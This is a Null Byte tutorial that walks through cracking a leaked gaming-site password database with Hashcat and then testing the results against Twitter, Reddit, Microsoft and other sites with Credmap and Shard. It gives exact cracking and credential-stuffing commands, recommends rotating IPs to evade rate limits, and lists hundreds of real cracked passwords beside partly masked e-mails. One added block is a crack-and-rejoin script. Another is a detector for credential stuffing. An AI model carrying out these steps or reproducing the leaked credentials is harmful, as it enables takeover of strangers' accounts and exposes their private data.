
How to Hack 200 Online User Accounts in Less Than 2 Hours (From Sites Like Twitter, Reddit, and Microsoft) «Null Bytes :: WonderHowTo



Leaked databases are scattered across the internet and nobody seems to notice. Data breaches happen so often that we have become numb to them. Join me as I show why reusing passwords across multiple websites is a truly terrible practice, by compromising hundreds of social media accounts from a single small leak.

LastPass published a recent poll:

More than 53% of respondents said they did not change their passwords in the last 12 months ... despite the news of a password-compromising data breach.

People are simply not interested in protecting their online identities better, and they underestimate their value to attackers. I became curious about how many online accounts an attacker could realistically compromise from a single data breach, so I started searching the open internet for leaked databases.

Step 1: Selecting the Candidate

Wanting a recent dump that would give a realistic picture of how far an attacker could get, I chose a small gaming website that suffered a data breach in 2017 and had its entire SQL database leaked. To protect the users and their identities, I will neither name the website nor disclose any of the e-mail addresses in the leak.

The dump consisted of approximately 1,100 unique e-mail addresses, usernames, hashed passwords, salts, and user IP addresses, separated by colons in the following format:

  email:username:hashed_password:salt:ip_address

Step 2: Cracking the Hashes

A password hash is the output of a one-way function: cheap to compute from a password, but designed to be infeasible to reverse. It is not encryption, and there is no key that turns a hash back into the plaintext. Cracking therefore means guessing: take a candidate password, hash it with the user's leaked salt, and compare the result to the stored hash. A match reveals the password. For this I used the best-known hash-cracking tool, Hashcat.

Created by Jens "atom" Steube, Hashcat is the self-proclaimed fastest and most advanced password recovery program in the world. It currently supports more than 200 highly optimized hash types, including NetNTLMv2, LastPass, WPA/WPA2, and vBulletin, the scheme used by my chosen gaming dataset. Unlike Aircrack-ng, Hashcat runs its attacks on GPUs, which are orders of magnitude faster than CPU-based cracking.

Step 3: Putting Brute-Force Attacks in Perspective

Many Null Byte regulars will have tried to crack a WPA2 handshake at some point in recent years. To give readers an idea of how much faster GPU-based brute-force attacks are than CPU-based ones, below is an Aircrack-ng benchmark (-S) against WPA2 keys on an Intel i7 CPU, the kind found in most modern laptops.

  aircrack-ng -S

8560 k/s

That's 8,560 WPA2 password attempts per second. To someone unfamiliar with brute-force attacks, that seems like a lot. But here's a Hashcat benchmark (-b) against WPA2 hashes (-m 2500) with a modest AMD GPU:

  hashcat -b -m 2500

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2500 - WPA/WPA2 (Iterations: 4096)

Speed.Dev.#1.....:   155.6 kH/s (417.48ms) @ Accel:128 Loops:256 Thr:256 Vec:1

155.6 kH/s is 155,600 password attempts per second, roughly what 18 Intel i7 CPUs would manage working on the same hash in parallel. That is how much faster a GPU can be.

Not all hashing algorithms offer the same level of protection; in fact, most offer very poor protection against this kind of brute-force attack. WPA2 deliberately runs 4,096 iterations of PBKDF2 per guess, which is why it benchmarks so low. Having established that the 1,100 hashes came from vBulletin, a popular forum platform, I ran the Hashcat benchmark again with the corresponding hash mode (-m 2711):

  hashcat -b -m 2711

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2711 - vBulletin >= v3.8.5

Speed.Dev.#1.....:  1949.6 MH/s (274.43ms) @ Accel:128 Loops:512 Thr:256 Vec:1

That's an estimated 1,949,600,000 (roughly 2 billion) password attempts per second, about 12,500 times the WPA2 rate on the same card. vBulletin's scheme is md5(md5(password) + salt): the per-user salt rules out precomputed tables, but two MD5 computations cost almost nothing per guess, so the salt does nothing to slow a cracker down. Hopefully this illustrates how easy it is for anyone with a modern GPU to crack hashes once a database has leaked.

Step 4: Brute-Forcing the Hashes

The raw SQL dump contained plenty of data that is irrelevant for cracking, such as user e-mail and IP addresses, so I extracted just the hashed passwords and salts into the following format, one pair per line:

  hashed_password:salt

The hashes were then fed to Hashcat with the following command:

  hashcat -a 0 -m 2711 ~/leaks/hashes/dataset.hashes ~/wordlists/wordlist.txt -w 4 --potfile-path ~/pots/dataset.potfile

The -a 0 argument selects a dictionary attack, or "straight mode": every line in wordlist.txt is tried against every hash. To maximize cracking speed I set the workload profile (-w) to 4, the highest setting, which dedicates the GPU to Hashcat and leaves the desktop unresponsive while it runs. Finally, --potfile-path stores the cracked hashes in the specified file, one hash:salt:password line each.

After running dozens of wordlists containing hundreds of millions of passwords against the dump, I had cracked about 330 (30%) of the 1,100 hashes in under an hour. Still not satisfied, I tried more of Hashcat's brute-forcing features:

  hashcat -a 3 -m 2711 ~/leaks/hashes/dataset.hashes ?l?l?l?l?l?l?d?d -w 4 --potfile-path ~/pots/dataset.potfile

Here I use Hashcat's mask attack (-a 3) to try every six-letter lowercase string (?l) followed by a two-digit number (?d). That keyspace is 26^6 × 10^2, about 31 billion candidates, which at roughly 2 billion guesses per second takes well under a minute. The run cracked over 100 more hashes, bringing the total to exactly 475, about 43% of the 1,100 in the dump.

After rejoining the cracked passwords with their corresponding e-mail addresses, I had 475 lines in the following format:

  ******@web.de:Sodium60
******@phaphach.com:Xi@oxiao123
*****@hotmail.nl:rockybalboa
********@gmail.com:ariel420
*******@HOTMAIL.COM:SLOANE01
******@paul198112.plus.com:creative
*******@hotmail.com:67thdtR8nP
******@gmail.com:bullets
*****@terra.com.mx:590416
******@gmail.com:juan930122
*******@aol.de:Madison1990
******@verizon.net:entropy33
*****@gmail.com:flyboy21
*******@gmail.com:rat7
********@jacks.sdstate.edu:entern0w
******@gmail.com:pookieg
******@hotmail.com:kevlar11
*******@myactv.net:1oldman1
******@hotmail.com:Dodgers
********@mail.ru:wodI14z2eF
*******@yahoo.de:bella1811
*****@gmail.com:jojo82
*****@hotmail.com:Metalfire
*******@gmail.com:nonoobs810
******@gmail.com:bobby10
*******@gmail.com:5Zurt8q8tQ
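To make Steps 2 through 4 concrete, here is an added example, written for this article and not taken from hashcat or from the author's tooling. It implements the vBulletin hash, runs a miniature dictionary attack and mask attack against three constructed records in the dump's email:username:hash:salt:ip layout, and rejoins the hits to their e-mail addresses the way the list above was produced. The records, salts, wordlist and the short ?l?l?d?d mask are all made up for the demo; a real run uses hashcat, which the benchmark shows doing the same two MD5 calls per guess billions of times per second.

```python
"""Added example for this article: how a leaked vBulletin dump is cracked and
rejoined. Illustrative code, not hashcat and not the author's tooling; the
records, salts, wordlist, and mask below are constructed."""
import hashlib
import itertools
import string


def vbulletin_hash(password: str, salt: str) -> str:
    """vBulletin >= 3.8.5 (hashcat -m 2711): md5(md5(password) + salt).
    The salt blocks precomputed tables but adds no work per guess."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


# Hashcat mask charsets (subset): ?l lower, ?u upper, ?d digit, ?s symbol.
CHARSETS = {"l": string.ascii_lowercase, "u": string.ascii_uppercase,
            "d": string.digits, "s": string.punctuation}


def mask_candidates(mask: str):
    """Expand a mask such as '?l?l?d?d' into every candidate string (-a 3)."""
    parts = mask.split("?")[1:]                 # '?l?l?d?d' -> ['l','l','d','d']
    for combo in itertools.product(*(CHARSETS[p] for p in parts)):
        yield "".join(combo)


def crack(records, candidates):
    """Guess-and-compare over (hash, salt) pairs. Returns {(hash, salt): password},
    the same data hashcat writes to its potfile as hash:salt:password."""
    pending = set(records)
    cracked = {}
    for guess in candidates:
        if not pending:
            break
        inner = hashlib.md5(guess.encode("utf-8")).hexdigest()   # once per guess
        for h, salt in list(pending):                             # once per salt
            if hashlib.md5((inner + salt).encode("utf-8")).hexdigest() == h:
                cracked[(h, salt)] = guess
                pending.discard((h, salt))
    return cracked


def rejoin(dump_lines, cracked):
    """Map cracked (hash, salt) pairs back to the dump's e-mail addresses,
    giving the email:password lines Credmap and Shard consume."""
    out = []
    for line in dump_lines:
        email, _user, h, salt, _ip = line.split(":")
        if (h, salt) in cracked:
            out.append(f"{email}:{cracked[(h, salt)]}")
    return out


def demo_salt(seed: str) -> str:
    """Deterministic 30-char salt for the constructed records (real ones are random)."""
    return hashlib.sha256(seed.encode()).hexdigest()[:30]


# Constructed users, not from the leak. Layout: email:username:hash:salt:ip
SAMPLE_USERS = [("alice@example.com", "alice", "dragon", "203.0.113.10"),
                ("bob@example.net", "bob", "ok99", "203.0.113.11"),
                ("carol@example.org", "carol", "Tr0ub4dor&3", "203.0.113.12")]
SAMPLE_DUMP = [f"{e}:{u}:{vbulletin_hash(p, demo_salt(u))}:{demo_salt(u)}:{ip}"
               for e, u, p, ip in SAMPLE_USERS]
WORDLIST = ["123456", "password", "dragon", "letmein"]   # stand-in for wordlist.txt


def run_demo():
    """Straight attack (-a 0), then a tiny mask attack (-a 3) on what is left.
    The article's ?l?l?l?l?l?l?d?d mask is 26^6 * 100 candidates, a GPU job."""
    records = [tuple(l.split(":")[2:4]) for l in SAMPLE_DUMP]
    cracked = crack(records, WORDLIST)
    remaining = [r for r in records if r not in cracked]
    cracked.update(crack(remaining, mask_candidates("?l?l?d?d")))
    return rejoin(SAMPLE_DUMP, cracked)


if __name__ == "__main__":
    for line in run_demo():
        print(line)       # carol's Tr0ub4dor&3 survives both attacks
```

Computing the inner md5(password) once per guess and only the outer MD5 once per salt mirrors why a salted-but-fast scheme still falls quickly: the salt multiplies the work by the number of distinct users, not by any tunable cost factor.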

Step 5: Verification of password reuse

As mentioned, this dump came from a small, little-known gaming website, and the game accounts themselves would be of little value to an attacker. The value lies in how many of these users reused the same username, e-mail address, and password on other, more popular sites.

To find out, I used two tools, Credmap and Shard, to automate password-reuse detection. They do much the same thing, but I cover both because their results differed in several ways, discussed later in this article.

Option 1: Using Credmap

Credmap is a Python script with no dependencies. Just clone the GitHub repository and change into the credmap/ directory to use it.

  git clone https://github.com/lightos/credmap
cd credmap 

The --list argument displays the sites Credmap currently supports.

  ./credmap.py --list


credmap v0.1-d862247 (https://github.com/lightos/credmap/)

- scribd.com
- en.wikipedia.org
- stackoverflow.com
- digitalocean.com
- yahoo.com
- linkedin.com
- wunderlist.com
- bitbucket.org
- twitter.com
- amazon.com
- ebay.com
- groupon.com
- soundcloud.com
- spotify.com
- airbnb.com
- live.com
- imgur.com
- foursquare.com
- pinterest.com
- instagram.com
- twitch.tv
- yelp.com
- github.com
- pastebin.com
- facebook.com
- reddit.com
- zoho.com
- vimeo.com

The --load argument takes a file of "username:password" lines. For sites that only allow signing in with an e-mail address, Credmap also supports the "username|email:password" format, selected with --format "u|e:p".

  ./credmap.py --load ~/leaks/cracked/dataset_user_email_pass_combos.txt --format "u|e:p" --exclude "groupon.com,instagram.com"

During my tests, I found that both Groupon and Instagram blocked or blacklisted my IP address after a few minutes of Credmap activity, no doubt because of the dozens of failed login attempts arriving from one address in that time. I excluded these sites (--exclude), but a motivated attacker could simply rotate source IP addresses between attempts and throttle the request rate to stay below whatever threshold a site's rate limiting uses.

The results of the Credmap command were surprising:

  [username:9v6Zyl1heT] on "Bitbucket" ...
[username:allus82] on "Reddit" ...
[username:Jesus4ever] on "Reddit" ...
[username:Jesus4ever] on "Bitbucket" ...
[username:s4mb4lb1J] on "Bitbucket" ...
[username:xjsv12] on "Bitbucket" ...
[username:rosied] on "Bitbucket" ...
[username:xbox360] on "Microsoft Live Account" ...
[username:seventeen17] on "Bitbucket" ...
[username:starwars] on "Scribd" ...
[username:Presario123] on "Bitbucket" ...
[username:podpod] on "Bitbucket" ...
[username:podpod] on "Microsoft Live Account" ...
[username:for795] on "Bitbucket" ...
[username:isbandia] on "Wikipedia" ...
[username:isbandia] on "Bitbucket" ...
[username:wtEq5n22aH] on "Scribd" ...
[username:240sxse] on "Reddit" ...
[username:warhammer40k5] on "Bitbucket" ...
[username:abeeagle] on "Reddit" ...
[username:99bottles] on "Reddit" ...
[username:99bottles] on "Wunderlist" ...
[username:99bottles] on "Microsoft Live Account" ...
[username:Checkers12] on "Reddit" ...
[username:Checkers12] on "Bitbucket" ...
[username:morgan13] on "Pinterest" ...
[username:greencar.] on "Microsoft Live Account" ...
[username:Warzone1] on "Bitbucket" ...
[username:o83bjJ1rzQ] on "Bitbucket" ...
[username:kajfarik] on "Foursquare" ...
[username:kajfarik] on "Bitbucket" ...
[username:1324Michael1324] on "Reddit" ...
[username:max1mili0n] on "Microsoft Live Account" ...
[username:s8elpz7c] on "Microsoft Live Account" ...
[username:hitman] on "Reddit" ...
[username:u9Q98rtikC] on "Bitbucket" ...
[username:ab1g0r] on "Bitbucket" ...
[username:stingray951] on "Bitbucket" ...
[username:tard] on "Bitbucket" ...
[username:Pumpkin007] on "Bitbucket" ...
[username:h8802123] on "Reddit" ...
[username:ownership1] on "Bitbucket" ...
[username:N289wewtzF] on "Bitbucket" ...
[username:Hummer1234] on "Bitbucket" ...
[username:igniter123] on "Reddit" ...
[username:167706] on "Bitbucket" ...
[username:12341234] on "Bitbucket" ...
[username:sniper] on "Bitbucket" ...
[username:1212111] on "Bitbucket" ...
[username:element1] on "Bitbucket" ...
[username:mrb1087410] on "Bitbucket" ...
[username:3k3f6wJxnK] on "Bitbucket" ...
[username:spy929] on "Bitbucket" ...
[username:qy913zdXpN] on "Bitbucket" ...
[username:E5jnhui83D] on "Bitbucket" ...
[username:6qfu6oeI8V] on "Bitbucket" ...
[username:Nd9nw88grB] on "Scribd" ...
[username:REGan181] on "Bitbucket" ...
[username:skuli2779] on "Scribd" ...
[username:phalanx1] on "Foursquare" ...
[username:ariel420] on "Microsoft Live Account" ...
[username:SLOANE01] on "Bitbucket" ...
[username:67thdtR8nP] on "Scribd" ...
[username:bullets] on "Bitbucket" ...
[username:flyboy21] on "Wunderlist" ...
[username:pookieg] on "Reddit" ...
[username:bella1811] on "Reddit" ...
[username:jojo82] on "Foursquare" ...
[username:nonoobs810] on "Microsoft Live Account" ...
[username:maxima1231] on "Reddit" ...
[username:maxima1231] on "Pinterest" ...
[username:ai7o8Z8vxO] on "Scribd" ...
[username:mustang1] on "Reddit" ...
[username:M.ustang9939] on "Bitbucket" ...
[username:Balingwenwen123] on "Bitbucket" ...
[username:dragao] on "Bitbucket" ...
[username:7egixeO38Q] on "Scribd" ...
[username:astonm] on "Bitbucket" ...
[username:Nascar2405] on "Foursquare" ...
[username:Nascar2405] on "Microsoft Live Account" ...
[username:carrie0530] on "Reddit" ...
[username:F85wdvq3kX] on "Bitbucket" ...
[username:A2w9taks7L] on "Scribd" ...
[username:A2w9taks7L] on "Linkedin" ...
[username:Hxopz542] on "Reddit" ...
[username:hd070800] on "Pinterest" ...
[username:hd070800] on "Bitbucket" ...
[username:piper1956] on "Bitbucket" ...
[username:123123qweqwe] on "Reddit" ...
[username:xboxlive] on "Reddit" ...
[username:xboxlive] on "Pinterest" ...
[username:Xi%40oxiao123] on "Bitbucket" ...
[username:metallica12] on "Bitbucket" ...
[username:sianlaser12] on "Pinterest" ...
[username:h8ep81knFR] on "Reddit" ...
[username:plummer92] on "Reddit" ...
[username:plummer92] on "Bitbucket" ...
[username:8246jt] on "Reddit" ...
[username:8246jt] on "Scribd" ...
[username:271bEzxonZ] on "Bitbucket" ...
[username:6911747] on "Scribd" ...
[username:6911747] on "Bitbucket" ...
[username:raejas11] on "Bitbucket" ...
[username:d0bb3lts4lt0] on "Microsoft Live Account" ...
[username:2yvpdl13CP] on "Scribd" ...
[username:dodgers123] on "Bitbucket" ...
[username:urbanus] on "Reddit" ...
[username:0506571670] on "Foursquare" ...
[username:gyqK8Giz1P] on "Bitbucket" ...
[username:e6bnvVo67H] on "Bitbucket" ...
[username:92k2cizCdP] on "Scribd" ...
[username:drnCy43g4O] on "Reddit" ...
[username:Ayrtonsenna1] on "Bitbucket" ...
[username:aerielle] on "Microsoft Live Account" ...
[username:12341234a] on "Reddit" ...
[username:6Ibit6qp1F] on "Bitbucket" ...
[username:5n6xcd6rPD] on "Scribd" ...
[username:5n6xcd6rPD] on "Bitbucket" ...
[username:Redalert1] on "Bitbucket" ...
[username:2689874] on "Scribd" ...
[username:2689874] on "Pinterest" ...
[username:bma81092] on "Reddit" ...
[username:bma81092] on "Bitbucket" ...
[username:csibi2007] on "Reddit" ...
[username:alterego] on "Bitbucket" ...
[username:tournament] on "Bitbucket" ...
[username:Lena2020] on "Pinterest" ...
[username:Lena2020] on "Bitbucket" ...
[username:alejandro] on "Scribd" ...
[username:alejandro] on "Bitbucket" ...
[username:Imtr0uble] on "Bitbucket" ...
[username:sucette] on "Bitbucket" ...
[username:pipQc5p24Q] on "Bitbucket" ...
[username:moomoo] on "Pinterest" ...
[username:N0t3p%40D%21] on "Scribd" ...
[username:N0t3p%40D%21] on "Pinterest" ...
[username:7bR9bft8cQ] on "Bitbucket" ...
[username:puzzle] on "Bitbucket" ...
[username:spartan117] on "Microsoft Live Account" ...
[username:scooby1621] on "Microsoft Live Account" ...
[username:mike1828] on "Microsoft Live Account" ...
[username:fifer123] on "Microsoft Live Account" ...
[username:e5Bo1fx3kF] on "Scribd" ...
[username:monkey] on "Reddit" ...
[username:darkstar] on "Bitbucket" ...
[username:irzF9k6p1H] on "Reddit" ...
[username:8yu9hkwV9Q] on "Scribd" ...
[username:c0mmand] on "Bitbucket" ...
[username:doppler] on "Reddit" ...
[username:doppler] on "Scribd" ...
[username:jh5thrwgefsdfs] on "Bitbucket" ...
[username:roblox12] on "Bitbucket" ...
[username:aqwzsxedc] on "Bitbucket" ...
[username:12345tessi] on "Bitbucket" ...
[username:helmond] on "Bitbucket" ...
[username:Liam1123] on "Reddit" ...
[username:liptoo98] on "Scribd" ...
[username:b82olSn4yH] on "Bitbucket" ...
[username:bossos2] on "Microsoft Live Account" ...
[username:highjump] on "Bitbucket" ...
[username:juhu1230] on "Reddit" ...
[username:bepolite] on "Reddit" ...
[username:M00nglum] on "Microsoft Live Account" ...
[username:Adw2u1h3tO] on "Bitbucket" ...
[username:Manly123] on "Bitbucket" ...
[username:ragnarok01] on "Reddit" ...
[username:useless] on "Pinterest" ...
[username:starwars97] on "Reddit" ...
[username:doodle] on "Bitbucket" ...
[username:TYzt2013] on "Bitbucket" ...
[username:Cheese77] on "Microsoft Live Account" ...
[username:voxpi384] on "Bitbucket" ...
[username:allah4life] on "Reddit" ...
[username:allah4life] on "Wunderlist" ...
[username:Jackal67] on "Reddit" ...
[username:Jackal67] on "Bitbucket" ...
[username:jasmine00] on "Bitbucket" ...
[username:LXfn3BG952] on "Reddit" ...
[username:alfiedog12] on "Pinterest" ...
[username:25262928] on "Reddit" ...
[username:25262928] on "Bitbucket" ...
[username:Rat_isthebest] on "Foursquare" ...
[username:Rat_isthebest] on "Scribd" ...
[username:Rat_isthebest] on "Bitbucket" ...
[username:Rat_isthebest] on "Wunderlist" ...
[username:4kg83zRltG] on "Scribd" ...
[username:4kg83zRltG] on "Bitbucket" ...
[username:f1scher] on "Reddit" ...
[username:o23jwr8uFD] on "Reddit" ...
[username:o23jwr8uFD] on "Bitbucket" ...
[username:ikbengek1] on "Pinterest" ...
[username:Trustno1%21] on "Bitbucket" ...
[username:trudat] on "Bitbucket" ...
[username:tototomy] on "Bitbucket" ...
[username:qwer1234] on "Bitbucket" ...
[username:1391730] on "Foursquare" ...
[username:robby123] on "Scribd" ...
[username:actsman7] on "Bitbucket" ...
[username:whodey] on "Wunderlist" ...
[username:308184rt] on "Reddit" ...
[username:108Resistance] on "Bitbucket" ...
[username:yilin9409] on "Scribd" ...
[username:joshuavi] on "Reddit" ...
[username:damnkids] on "Bitbucket" ...
[username:jbncde5hn6y5] on "Bitbucket" ...
[username:roblox12] on "Reddit" ...
[username:roblox12] on "Bitbucket" ...
[username:azerty00] on "Reddit" ...
[username:azerty00] on "Pinterest" ...
[username:gymkhana] on "Bitbucket" ...
[username:gymkhana] on "Wunderlist" ...
[username:newgame] on "Reddit" ...
[username:dacheng198] on "Scribd" ...
[username:123456] on "Bitbucket" ...
[username:syndrom02] on "Reddit" ...
[username:Paintball1] on "Bitbucket" ...
[username:4536729] on "Bitbucket" ...
[username:rawtheme22] on "Reddit" ...
[username:rawtheme22] on "Bitbucket" ...
[username:sobaked123] on "Microsoft Live Account" ...
[username:Thee1234] on "Bitbucket" ...
[username:sersna7] on "Bitbucket" ...
[username:indonesia2016] on "Scribd" ...
[username:indonesia2016] on "Microsoft Live Account" ...
[username:Ou6tlgr87N] on "Scribd" ...
[username:sea2shell] on "Reddit" ...
[username:01cs653] on "Reddit" ...
[username:73icJf3ilZ] on "Scribd" ...
[username:ndyr761pGO] on "Bitbucket" ...
[username:prosk8ter] on "Bitbucket" ...
[username:games%21%21%21] on "Pinterest" ...
[username:games%21%21%21] on "Microsoft Live Account" ...
[username:gt9800] on "Bitbucket" ...
[username:mel4tipp] on "Microsoft Live Account" ...
[username:mvp123] on "Reddit" ...
[username:mvp123] on "Bitbucket" ...
[username:3g82tafLbY] on "Bitbucket" ...
[username:arturi09] on "Wunderlist" ...
[username:arturi09] on "Microsoft Live Account" ...
[username:092486] on "Bitbucket" ...
[username:sappeps12345] on "Reddit" ...
[username:1morerep] on "Bitbucket" ...
[username:Finalfantasy89] on "Reddit" ...
[username:Finalfantasy89] on "Bitbucket" ...
[username:11%3D11bts] on "Scribd" ... 

All usernames have been redacted, but the output shows 246 accounts on Reddit, Microsoft Live, Scribd, Foursquare, Wunderlist, and the other listed sites whose username and password combination matched the small gaming website's dataset.
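The blocking that Groupon and Instagram applied during the run above is the simplest credential-stuffing defence, and the IP rotation and throttling that evade it are equally simple. As an added example, written for this article and not taken from Credmap, Shard, or any of the sites named, the following script shows both patterns in a constructed authentication log and two detection rules a site can run over it: a per-source rule that catches the Credmap-style burst, and an aggregate rule that catches the low-and-slow variant, where each IP touches only one account. The log format, IP addresses, usernames and thresholds are constructed for the demo.

```python
"""Added example for this article: detecting credential stuffing in auth logs.
Not from Credmap, Shard, or any site's real defenses. Log format, addresses,
usernames, and thresholds are constructed for the demo."""
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_log():
    """Build a sample log: '<ISO time> <ip> <username> <ok|fail>' per line."""
    lines = []
    # (a) Credmap-style burst: one IP, 10 usernames in 20 s, one reused password works.
    users = ["alice", "bob", "carol", "dave", "erin",
             "frank", "grace", "heidi", "ivan", "judy"]
    for i, u in enumerate(users):
        lines.append(f"2018-03-01T10:00:{2 * i:02d} 198.51.100.7 {u} "
                     f"{'ok' if u == 'carol' else 'fail'}")
    # (b) A legitimate user mistyping once, then signing in: must not be flagged.
    lines += ["2018-03-01T10:05:00 203.0.113.5 alice fail",
              "2018-03-01T10:05:30 203.0.113.5 alice ok"]
    # (c) Low-and-slow: 12 IPs, one username each, one failure, 4 minutes apart.
    for i in range(12):
        lines.append(f"2018-03-01T11:{4 * i:02d}:00 192.0.2.{i + 1} user{i:02d} fail")
    return "\n".join(lines)


def parse(log_text):
    """Return (time, ip, username, succeeded) tuples sorted by time."""
    events = []
    for line in log_text.splitlines():
        ts, ip, user, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, user, result == "ok"))
    return sorted(events)


def stuffing_sources(events, window=timedelta(minutes=10),
                     min_users=8, min_fail_ratio=0.7):
    """Rule 1 (per source): an IP that tries many distinct usernames in a short
    window, mostly failing. Returns {ip: [accounts it logged into]}, i.e. the
    reused credentials that worked and should be reset."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))
    flagged = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):          # sliding window over this IP's events
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            distinct = {u for _, u, _ in win}
            fails = sum(1 for _, _, ok in win if not ok)
            if len(distinct) >= min_users and fails / len(win) >= min_fail_ratio:
                flagged[ip] = sorted({u for _, u, ok in win if ok})
                break
    return flagged


def distributed_stuffing(events, window=timedelta(hours=1), min_ips=10, min_users=10):
    """Rule 2 (aggregate): many IPs that each touch exactly one username and
    fail. No single IP exceeds a per-source limit, so only the aggregate shows
    the attack. Returns the first window that trips, or None. In production the
    thresholds should come from the site's normal failed-login baseline."""
    fails = [(ts, ip, u) for ts, ip, u, ok in events if not ok]
    users_per_ip = defaultdict(set)
    for _, ip, u in fails:
        users_per_ip[ip].add(u)
    singles = [e for e in fails if len(users_per_ip[e[1]]) == 1]
    start = 0
    for end in range(len(singles)):
        while singles[end][0] - singles[start][0] > window:
            start += 1
        win = singles[start:end + 1]
        ips = {ip for _, ip, _ in win}
        users = {u for _, _, u in win}
        if len(ips) >= min_ips and len(users) >= min_users:
            return {"from": win[0][0], "to": win[-1][0],
                    "ips": len(ips), "users": len(users)}
    return None


if __name__ == "__main__":
    evs = parse(constructed_log())
    print("per-source stuffing:", stuffing_sources(evs))
    print("distributed stuffing:", distributed_stuffing(evs))
```

Rule 1 is what an IP blacklist reacts to, and the accounts it returns are the ones whose reused password just worked; those need a forced reset, not just a blocked IP. Rule 2 only fires on the population as a whole, which is the point: a per-IP limit cannot see twelve addresses each making one attempt.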

Option 2: Using Shard

Shard requires Java, which is not installed on Kali by default; install it with:

  sudo apt-get install default-jre

Then download the latest Shard release with wget:

  wget https://github.com/philwantsfish/shard/releases/download/1.5/shard-1.5.jar

As with Credmap, the --list argument shows the sites Shard supports.

  java -jar shard-1.5.jar --list

[+] Available modules:
[+] Facebook
[+] LinkedIn
[+] Reddit
[+] Twitter
[+] Instagram
[+] GitHub
[+] BitBucket
[+] Kijiji
[+] DigitalOcean
[+] Vimeo
[+] Laposte
[+] Dailymotion 

Running Shard requires only the --file argument pointing at the credential list to begin detecting password reuse.

  java -jar shard-1.5.jar --file ~/leaks/cracked/dataset_user_email_pass_combos.txt

[+] Execution in multi-user multi-password mode
[+] Parsing 475 credentials
[+] 11 modules are running
[+] *******@mail.ru:9v6Zyl1heT - Twitter
[+] *******@mail.ru:y2v7nG3oeJ - BitBucket
[+] *******@hotmail.com:5Zurt8q8tQ - BitBucket
[+] *******@yandex.com:gD82guh6iS - BitBucket
[+] *******@hotmail.com:jellybaby - BitBucket
[+] *******@gmail.com:actsman7 - Twitter, BitBucket
[+] *******@gmail.com:eternity1 - BitBucket
[+] *******@gmail.com:joker7 - BitBucket
[+] *******@aol.com:xbox360 - BitBucket
[+] *******@gmail.com:pie110016678 - BitBucket
[+] *******@live.com:roblox12 - BitBucket
[+] *******@gmail.com:andre0 - BitBucket
[+] *******@qq.com:123456 - BitBucket
[+] *******@hotmail.com:hellomotto - BitBucket
[+] *******@outlook.com:Cromador - BitBucket
[+] *******@hotmail.co.uk:ibanez92 - Twitter
[+] *******@hotmail.com:Presario123 - Twitter
[+] *******@op.pl:isbandia - BitBucket
[+] *******@gmail.com:240sxse - BitBucket
[+] *******@gmail.com:99bottles - Twitter
[+] *******@gmail.com:Checkers12 - Twitter, BitBucket
[+] *******@yahoo.com:Speckles - BitBucket
[+] *******@aol.fr:o83bjJ1rzQ - BitBucket
[+] *******@michaelbodach.com:1324Michael1324 - BitBucket
[+] *******@gmail.com:drhs2012 - Twitter
[+] *******@btinternet.com:max1mili0n - Facebook, BitBucket
[+] *******@gmail.com:s8elpz7c - Twitter
[+] *******@yahoo.com:hitman - Twitter
[+] *******@mail.ru:e6bnvVo67H - BitBucket
[+] *******@gmail.com:ab1g0r - BitBucket
[+] *******@gmail.com:snickers7 - BitBucket
[+] *******@gmail.com:1949qweA - BitBucket
[+] *******@live.se:stingray951 - Twitter, BitBucket
[+] *******@outlook.com:Pumpkin007 - Facebook
[+] *******@yahoo.com:baseball11 - Twitter
[+] *******@hotmail.com:h8802123 - BitBucket
[+] *******@mail.ru:i7q8c8jDkW - BitBucket
[+] *******@gmail.com:Hummer1234 - BitBucket
[+] *******@hotmail.com:50killer - BitBucket, Kijiji
[+] *******@gmail.com:igniter123 - BitBucket
[+] *******@hotmail.se:joker123 - BitBucket
[+] *******@gmail.com:orlando.12 - BitBucket
[+] *******@gmail.com:167706 - Twitter
[+] *******@hotmail.com:pssp643056 - Twitter
[+] *******@gmail.com:tacotico - Twitter, BitBucket
[+] *******@Hotmail.com:12341234 - Twitter
[+] *******@comcast.net:1212111 - BitBucket
[+] *******@mail.ru:2hg5hd4uEE - BitBucket
[+] *******@yahoo.com:element1 - BitBucket
[+] *******@msn.com:trooper71 - Facebook, Twitter
[+] *******@gmail.com:Mustang7991 - BitBucket
[+] *******@gmail.com:fuckthat - BitBucket
[+] *******@gmail.com:qy913zdXpN - BitBucket
[+] *******@hotmail.com:vdz3888 - BitBucket
[+] *******@rogers.com:maplew00d - Facebook
[+] *******@hotmail.com:Nd9nw88grB - BitBucket
[+] *******@msn.com:1234567890 - BitBucket
[+] *******@yahoo.com:p00p00p00 - Twitter, BitBucket
[+] *******@HOTMAIL.COM:SLOANE01 - BitBucket
[+] *******@paul198112.plus.com:creative - BitBucket
[+] *******@terra.com.mx:590416 - BitBucket
[+] *******@gmail.com:juan930122 - Facebook, Twitter, BitBucket
[+] *******@aol.de:Madison1990 - BitBucket
[+] *******@verizon.net:entropy33 - BitBucket
[+] *******@gmail.com:rat7 - BitBucket
[+] *******@jacks.sdstate.edu:enten0w - BitBucket
[+] *******@hotmail.com:kevlar11 - BitBucket
[+] *******@hotmail.com:Dodgers - BitBucket
[+] *******@mail.ru:wodI14z2eF - BitBucket
[+] *******@gmail.com:Jojo82 - BitBucket
[+] *******@gmail.com:maxima1231 - Facebook, BitBucket
[+] *******@yahoo.com:mustang1 - BitBucket
[+] *******@gmail.com:M.ustang9939 - Twitter, BitBucket
[+] *******@gmail.com:ROFLMAO - BitBucket
[+] *******@gmail.com:qwerty - BitBucket
[+] *******@gmail.com:skatebrd1 - Twitter
[+] *******@gmail.com:carrie0530 - BitBucket
[+] *******@gmail.com:Hxopz542 - Twitter, BitBucket
[+] *******@gmail.com:hd070800 - Facebook
[+] *******@yahoo.com:xboxlive - BitBucket
[+] *******@gmail.com:sianlaser12 - BitBucket
[+] *******@live.co.uk:newworldorder11 - Facebook, Twitter
[+] *******@mail.ru:t57yuuD2nH - BitBucket
[+] *******@mail.ru:h8ep81knFR - Twitter, BitBucket
[+] *******@msn.com:Legion01 - Twitter
[+] *******@gmail.com:Vapor1948 - BitBucket
[+] *******@hotmail.com:Kerri14 - BitBucket
